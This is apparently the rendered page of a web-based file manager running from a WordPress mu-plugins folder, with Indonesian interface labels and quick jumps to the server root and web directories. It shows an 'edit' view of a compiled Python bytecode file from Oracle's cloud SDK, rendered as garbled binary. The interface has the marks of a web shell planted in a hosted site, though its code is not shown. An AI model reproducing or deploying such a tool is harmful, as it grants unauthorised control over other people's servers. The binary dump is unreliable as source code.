📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
stack_monitoring
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/stack_monitoring/models/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: os_command_query_properties.cpython-39.opt-1.pyc
a ���f" � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�MetricExtensionQueryProperties� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zdd� Zdd� Z dd� ZdS )�OsCommandQueryPropertieszM Query Properties applicable to OS_COMMAND type of collection method c K sV ddddddd�| _ dddddd d�| _d | _d | _d | _d | _d | _d | _d| _d S )a� Initializes a new OsCommandQueryProperties object with values from keyword arguments. The default value of the :py:attr:`~oci.stack_monitoring.models.OsCommandQueryProperties.collection_method` attribute of this class is ``OS_COMMAND`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param collection_method: The value to assign to the collection_method property of this OsCommandQueryProperties. Allowed values for this property are: "OS_COMMAND", "SQL", "JMX" :type collection_method: str :param command: The value to assign to the command property of this OsCommandQueryProperties. :type command: str :param delimiter: The value to assign to the delimiter property of this OsCommandQueryProperties. :type delimiter: str :param script_details: The value to assign to the script_details property of this OsCommandQueryProperties. :type script_details: oci.stack_monitoring.models.ScriptFileDetails :param arguments: The value to assign to the arguments property of this OsCommandQueryProperties. :type arguments: str :param starts_with: The value to assign to the starts_with property of this OsCommandQueryProperties. :type starts_with: str �strZScriptFileDetails)Zcollection_method�command� delimiter�script_details� arguments�starts_withZcollectionMethodr r Z scriptDetailsr Z startsWithNZ OS_COMMAND)Z swagger_typesZ attribute_mapZ_collection_method�_command� _delimiter�_script_details� _arguments�_starts_with)�self�kwargs� r �[/usr/lib/python3.9/site-packages/oci/stack_monitoring/models/os_command_query_properties.py�__init__ s* !� � z!OsCommandQueryProperties.__init__c C s | j S )z� **[Required]** Gets the command of this OsCommandQueryProperties. OS command to execute without arguments :return: The command of this OsCommandQueryProperties. :rtype: str �r �r r r r r L s z OsCommandQueryProperties.commandc C s || _ dS )z� Sets the command of this OsCommandQueryProperties. OS command to execute without arguments :param command: The command of this OsCommandQueryProperties. :type: str Nr )r r r r r r X s c C s | j S )z� **[Required]** Gets the delimiter of this OsCommandQueryProperties. Character used to delimit multiple metric values in single line of output :return: The delimiter of this OsCommandQueryProperties. :rtype: str �r r r r r r d s z"OsCommandQueryProperties.delimiterc C s || _ dS )z� Sets the delimiter of this OsCommandQueryProperties. Character used to delimit multiple metric values in single line of output :param delimiter: The delimiter of this OsCommandQueryProperties. :type: str Nr )r r r r r r p s c C s | j S )z� Gets the script_details of this OsCommandQueryProperties. :return: The script_details of this OsCommandQueryProperties. :rtype: oci.stack_monitoring.models.ScriptFileDetails �r r r r r r | s z'OsCommandQueryProperties.script_detailsc C s || _ dS )z� Sets the script_details of this OsCommandQueryProperties. :param script_details: The script_details of this OsCommandQueryProperties. :type: oci.stack_monitoring.models.ScriptFileDetails Nr )r r r r r r � s c C s | j S )z� Gets the arguments of this OsCommandQueryProperties. Arguments required by either command or script :return: The arguments of this OsCommandQueryProperties. :rtype: str �r r r r r r � s z"OsCommandQueryProperties.argumentsc C s || _ dS )z� Sets the arguments of this OsCommandQueryProperties. Arguments required by either command or script :param arguments: The arguments of this OsCommandQueryProperties. :type: str Nr )r r r r r r � s c C s | j S )z� Gets the starts_with of this OsCommandQueryProperties. String prefix used to identify metric output of the OS Command :return: The starts_with of this OsCommandQueryProperties. :rtype: str �r r r r r r � s z$OsCommandQueryProperties.starts_withc C s || _ dS )z� Sets the starts_with of this OsCommandQueryProperties. String prefix used to identify metric output of the OS Command :param starts_with: The starts_with of this OsCommandQueryProperties. :type: str Nr )r r r r r r � s c C s t | �S �N)r r r r r �__repr__� s z!OsCommandQueryProperties.__repr__c C s |d u rdS | j |j kS )NF)�__dict__�r �otherr r r �__eq__� s zOsCommandQueryProperties.__eq__c C s | |k S r r r"